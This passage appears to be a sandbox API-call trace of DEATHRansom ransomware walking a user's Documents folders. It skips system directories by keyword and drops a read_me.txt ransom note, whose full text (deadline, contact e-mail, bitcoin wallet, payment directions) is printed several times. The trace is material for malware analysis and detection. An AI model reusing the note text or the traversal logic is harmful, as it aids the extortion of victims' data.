ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.398] WriteFile (in: hFile=0x7b4, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.399] CloseHandle (hObject=0x7b4) returned 1 [0075.399] GetProcessHeap () returned 0x4f10000 [0075.399] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ba00d8 | out: hHeap=0x4f10000) returned 1 [0075.399] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x165e76d0, ftCreationTime.dwHighDateTime=0x1d52d54, ftLastAccessTime.dwLowDateTime=0x4a462490, ftLastAccessTime.dwHighDateTime=0x1d53cac, ftLastWriteTime.dwLowDateTime=0x4a462490, ftLastWriteTime.dwHighDateTime=0x1d53cac, nFileSizeHigh=0x0, nFileSizeLow=0xdae5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="9Z3cqEnbV.pptx", cAlternateFileName="9Z3CQE~1.PPT")) returned 1 [0075.399] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9Z3cqEnbV.pptx") returned 58 [0075.399] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe398800, ftCreationTime.dwHighDateTime=0x1d55b8f, ftLastAccessTime.dwLowDateTime=0x7facb470, ftLastAccessTime.dwHighDateTime=0x1d53dfe, ftLastWriteTime.dwLowDateTime=0x7facb470, ftLastWriteTime.dwHighDateTime=0x1d53dfe, nFileSizeHigh=0x0, nFileSizeLow=0x15907, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bExrSPFkXu33TXCdhRjV.xlsx", cAlternateFileName="BEXRSP~1.XLS")) returned 1 [0075.399] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bExrSPFkXu33TXCdhRjV.xlsx") returned 69 [0075.399] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0075.399] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned 55 [0075.399] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9462c700, ftCreationTime.dwHighDateTime=0x1d5482c, ftLastAccessTime.dwLowDateTime=0xe58edc30, ftLastAccessTime.dwHighDateTime=0x1d563d0, ftLastWriteTime.dwLowDateTime=0xe58edc30, ftLastWriteTime.dwHighDateTime=0x1d563d0, nFileSizeHigh=0x0, nFileSizeLow=0x1286a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="GP5bcTy5x8.docx", cAlternateFileName="GP5BCT~1.DOC")) returned 1 [0075.399] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\GP5bcTy5x8.docx") returned 59 [0075.399] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e03cd30, ftCreationTime.dwHighDateTime=0x1d55cd5, ftLastAccessTime.dwLowDateTime=0x27304e00, ftLastAccessTime.dwHighDateTime=0x1d53d9b, ftLastWriteTime.dwLowDateTime=0x27304e00, ftLastWriteTime.dwHighDateTime=0x1d53d9b, nFileSizeHigh=0x0, nFileSizeLow=0xae55, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="hMQmO8YBLr.xlsx", cAlternateFileName="HMQMO8~1.XLS")) returned 1 [0075.399] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\hMQmO8YBLr.xlsx") returned 59 [0075.399] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0075.399] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music") returned 52 [0075.399] lstrcmpW (lpString1="My Music", lpString2="..") returned 1 [0075.399] lstrcmpW (lpString1="My Music", lpString2=".") returned 1 [0075.400] StrStrW (lpFirst="my music", lpSrch="programdata") returned 0x0 [0075.400] StrStrW (lpFirst="my music", lpSrch="$recycle.bin") returned 0x0 [0075.400] StrStrW (lpFirst="my music", lpSrch="program files") returned 0x0 [0075.400] StrStrW (lpFirst="my music", lpSrch="windows") returned 0x0 [0075.400] StrStrW (lpFirst="my music", lpSrch="all users") returned 0x0 [0075.400] StrStrW (lpFirst="my music", lpSrch="appdata") returned 0x0 [0075.400] GetProcessHeap () returned 0x4f10000 [0075.400] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ba00d8 [0075.400] lstrcpyW (in: lpString1=0x8ba00d8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music" [0075.400] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 54 [0075.400] QueueUserWorkItem (Function=0x40a710, Context=0x8ba00d8, Flags=0x0) returned 1 [0075.400] GetProcessHeap () returned 0x4f10000 [0075.400] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c20118 [0075.400] wnsprintfW (in: pszDest=0x8c20118, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*") returned 54 [0075.400] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabc3a430, ftCreationTime.dwHighDateTime=0x1d4cd45, ftLastAccessTime.dwLowDateTime=0xc2aa53e0, ftLastAccessTime.dwHighDateTime=0x1d4d3b9, ftLastWriteTime.dwLowDateTime=0xc2aa53e0, ftLastWriteTime.dwHighDateTime=0x1d4d3b9, nFileSizeHigh=0x0, nFileSizeLow=0x129fa, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="_DYrqU5.xls", cAlternateFileName="廠疙휎᥵?\x17甴?\x17a")) returned 0xffffffff [0075.400] wnsprintfW (in: pszDest=0x8c20118, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\read_me.txt") returned 64 [0075.400] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my music\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b4 [0075.401] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.401] WriteFile (in: hFile=0x7b4, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.402] CloseHandle (hObject=0x7b4) returned 1 [0075.402] GetProcessHeap () returned 0x4f10000 [0075.402] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c20118 | out: hHeap=0x4f10000) returned 1 [0075.402] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0075.402] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures") returned 55 [0075.402] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1 [0075.402] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0075.402] StrStrW (lpFirst="my pictures", lpSrch="programdata") returned 0x0 [0075.402] StrStrW (lpFirst="my pictures", lpSrch="$recycle.bin") returned 0x0 [0075.402] StrStrW (lpFirst="my pictures", lpSrch="program files") returned 0x0 [0075.402] StrStrW (lpFirst="my pictures", lpSrch="windows") returned 0x0 [0075.402] StrStrW (lpFirst="my pictures", lpSrch="all users") returned 0x0 [0075.402] StrStrW (lpFirst="my pictures", lpSrch="appdata") returned 0x0 [0075.402] GetProcessHeap () returned 0x4f10000 [0075.402] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c20118 [0075.402] lstrcpyW (in: lpString1=0x8c20118, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures" [0075.402] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 55 [0075.402] QueueUserWorkItem (Function=0x40a710, Context=0x8c20118, Flags=0x0) returned 1 [0075.402] GetProcessHeap () returned 0x4f10000 [0075.402] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c30120 [0075.403] wnsprintfW (in: pszDest=0x8c30120, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*") returned 57 [0075.403] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabc3a430, ftCreationTime.dwHighDateTime=0x1d4cd45, ftLastAccessTime.dwLowDateTime=0xc2aa53e0, ftLastAccessTime.dwHighDateTime=0x1d4d3b9, ftLastWriteTime.dwLowDateTime=0xc2aa53e0, ftLastWriteTime.dwHighDateTime=0x1d4d3b9, nFileSizeHigh=0x0, nFileSizeLow=0x129fa, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="_DYrqU5.xls", cAlternateFileName="廠疙휎᥵?\x17甴?\x17a")) returned 0xffffffff [0075.404] wnsprintfW (in: pszDest=0x8c30120, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\read_me.txt") returned 67 [0075.404] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my pictures\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b4 [0075.404] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0075.404] WriteFile (in: hFile=0x7b4, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0075.405] CloseHandle (hObject=0x7b4) returned 1 [0075.405] GetProcessHeap () returned 0x4f10000 [0075.405] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8c30120 | out: hHeap=0x4f10000) returned 1 [0075.405] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0075.405] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned 53 [0075.405] lstrcmpW (lpString1="My Shapes", lpString2="..") returned 1 [0075.405] lstrcmpW (lpString1="My Shapes", lpString2=".") returned 1 [0075.405] StrStrW (lpFirst="my shapes", lpSrch="programdata") returned 0x0 [0075.405] StrStrW (lpFirst="my shapes", lpSrch="$recycle.bin") returned 0x0 [0075.405] StrStrW (lpFirst="my shapes", lpSrch="program files") returned 0x0 [0075.405] StrStrW (lpFirst="my shapes", lpSrch="windows") returned 0x0 [0075.405] StrStrW (lpFirst="my shapes", lpSrch="all users") returned 0x0 [0075.405] StrStrW (lpFirst="my shapes", lpSrch="appdata") returned 0x0 [0075.405] GetProcessHeap () returned 0x4f10000 [0075.405] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c30120 [0075.405] lstrcpyW (in: lpString1=0x8c30120, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" [0075.405] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 56 [0075.405] QueueUserWorkItem (Function=0x40a710, Context=0x8c30120, Flags=0x0) returned 1 [0075.405] GetProcessHeap () returned 0x4f10000 [0075.406] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8c40128 [0075.406] wnsprintfW (in: pszDest=0x8c40128, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*") returned 55 [0075.406] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe9a8 [0075.462] wnsprintfW (in: pszDest=0x8c40128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\.") returned 55 [0075.463] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0075.463] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.463] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0075.463] wnsprintfW (in: pszDest=0x8c40128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\..") returned 56 [0075.463] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.463] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0075.463] wnsprintfW (in: pszDest=0x8c40128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned 65 [0075.463] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0075.463] wnsprintfW (in: pszDest=0x8c40128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned 67 [0075.463] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17d808 | out: lpFindFileData=0x17d808*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="_private", cAlternateFileName="")) returned 1 [0075.463] wnsprintfW (in: pszDest=0x8c40128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned 62 [0075.463] lstrcmpW (lpString1="_private", lpString2="..") returned 1 [0075.463] lstrcmpW (lpString1="_private", lpString2=".") returned 1 [0075.463] StrStrW (lpFirst="_private", lpSrch="programdata") returned 0x0 [0075.463] StrStrW (lpFirst="_private", lpSrch="$recycle.bin") returned 0x0 [0075.463] StrStrW (lpFirst="_private", lpSrch="program files") returned 0x0 [0075.463] StrStrW (lpFirst="_private", lpSrch="windows") returned 0x0 [0075.463] StrStrW (lpFirst="_private", lpSrch="all users") returned 0x0 [0075.463] StrStrW (lpFirst="_private", lpSrch="appdata") returned 0x0 [0075.463] GetProcessHeap () returned 0x4f10000 [0075.463] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0075.463] lstrcpyW (in: lpString1=0x8ab0060, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" [0075.463] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 57 [0075.463] QueueUserWorkItem (Function=0x40a710, Context=0x8ab0060, Flags=0x0) returned 1 [0075.463] GetProcessHeap () returned 0x4f10000 [0075.463] RtlAllocateHeap (HeapHandle=0x4f10000, 